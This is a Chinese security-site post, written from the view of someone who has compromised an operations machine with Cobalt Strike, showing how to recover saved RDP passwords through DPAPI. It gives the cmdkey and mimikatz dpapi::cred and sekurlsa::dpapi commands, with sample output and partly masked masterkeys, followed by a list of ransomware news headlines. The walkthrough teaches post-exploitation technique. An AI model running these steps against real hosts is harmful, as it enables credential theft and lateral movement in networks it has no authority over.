网安 - 专业的网络安全产业、社区、知识平台

获取远程主机保存的RDP凭据密码

VSole2022-06-20 22:02:08

拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。

Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials

可通过命令行获取,执行: cmdkey /listpowerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force

注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。

使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

输出应类似

**BLOB**
dwVersion          : 00000001 - 1
guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey      : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
dwFlags            : 20000000 - 536870912 (system ; )
dwDescriptionLen   : 00000012 - 18
szDescription      : 本地凭据数据
algCrypt           : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen      : 00000100 - 256
dwSaltLen          : 00000020 - 32
pbSalt             : 726d845b8a4eba29875****10659ec2d5e210a48f
dwHmacKeyLen       : 00000000 - 0
pbHmackKey         : 
algHash            : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen       : 00000200 - 512
dwHmac2KeyLen      : 00000020 - 32
pbHmack2Key        : cda4760ed3fb1c7874****28973f5b5b403fe31f233
dwDataLen          : 000000c0 - 192
pbData             : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
dwSignLen          : 00000040 - 64
pbSign             : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

需要关注的是guidMasterKey、pbData,pbData是我们要解密的数据,guidMasterKey是解密所需要的密钥。这里LSASS已经在其缓存中存有这个key因此我们可以使用SeDebugPrivilege获取。

beacon> mimikatz !sekurlsa::dpapi  
mimikatz !sekurlsa::dpapi 
     [00000001]
     * GUID      :    {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
     * Time      :    2020/1/3 8:05:02
     * MasterKey :    02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
     * sha1(key) :    3e6dc57a0fe****a902cfaf617b1322
     [00000002]
     * GUID      :    {edcb491a-91d7-4d98-a714-8bc60254179f}
     * Time      :    2020/1/3 8:05:02
     * MasterKey :    c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
     * sha1(key) :    5e1b3eb1152d3****6d3d6f90aaeb

然后将凭据保存到本地,执行

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"

软件mimikatz
本作品采用《CC 协议》,转载必须注明作者和本文链接
Conti勒索软件利用低技术但有效的模型
2022-04-12 00:00:00
Conti勒索软件帝国竟然是建立在令人惊讶的低技术攻击方法和技术之上。
微软Exchange服务器被黑客攻击以部署Cuba勒索软件
2022-03-02 12:10:09
勒索软件Cuba正利用微软Exchange的漏洞进入企业网络并对设备进行加密。知名网络安全公司Mandiant追踪到,使用该勒索软件的团伙名为UNC2596,而勒索软件本身的名字为COLDDRAW。其实,这个勒索软件有一个更为人熟知的名字——Cuba,本文也将以这个名字引述它。
勒索软件对教育部门的影响
2021-10-19 12:21:12
此次感染迫使该公司在进行评估时关闭他们的管道作为预防措施,导致东海岸加油站排起长队。PYSA于2019年12月首次被发现。DoppelPaymer至少自2019年7月以来一直存在,并且是BitPaymer勒索软件家族的成员。考虑到教育部门最近多次成为攻击目标,他们显然不能免于勒索软件攻击。
Play 勒索软件影响了大约 300 个实体
2023-12-19 16:39:35
据澳大利亚和美国发布的最新联合网络安全咨询报告,截至2023年10月,Play 勒索软件背后的黑客影响了大约 300 个实体。
透视 Phobos 勒索软件的组织架构与攻击行动
2023-12-08 10:33:21
透视 Phobos 勒索软件的组织架构与攻击行动
萌新如何玩转mimikatz
2022-08-29 06:48:46
暑假快到了,身边好多师傅都开启了"卷王"模式,而我也在南城师傅的帮助下开始了内网这个新征程;mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。最后,再次谢谢南城师傅对本文的指导与帮助!!
勒索软件即服务:了解网络犯罪零工经济和如何保护自己
2022-08-15 06:40:02
Malwarebytes威胁情报公司每月通过监控勒索软件团伙在其暗网泄露网站上发布的信息来建立勒索软件活动的图景。这些信息代表的是那些成功被袭击但选择不支付赎金的受害者。
网络安全公司“Cybereason”发布关于“PYSA”勒索软件的威胁分析报告
2021-10-21 22:09:11
2021年9月27日,以色列网络安全企业Cybereason公司发布关于“PYSA”勒索软件的威胁分析报告称,“PYSA”勒索软件可能针对政府组织、教育机构、医疗组织等重要行业目标进行攻击。
2021年遭勒索软件攻击数量同比暴增1318%
2021-09-23 08:07:34
银行业受到勒索软件攻击激增的“严重影响”,2021年所遭勒索软件攻击数量同比暴增1318%。 勒索软件已成为现代企业最为普遍和臭名昭著的威胁之一。仅今年,我们就已见证数起重大勒索软件感染事件,包括Colonial Pipeline、Kaseya和爱尔兰医疗服务遭遇的那些,引发了从业务中断到能源短缺、国家紧急状态和医疗服务受限等一系列重大事故。
OnePercent 勒索软件集团通过 IceID 银行木马攻击公司
2021-08-24 12:36:21
联邦调查局警告公司,一个自称为 OnePercent 或 1Percent 的勒索软件组织正在利用 IceID 木马和 Cobalt Strike 后门在网络中站稳脚跟。与许多其他知名勒索软件组织一样,OnePercent 既加密又窃取公司数据,威胁受害者如果不支付赎金就发布或拍卖信息。
VSole
网络安全专家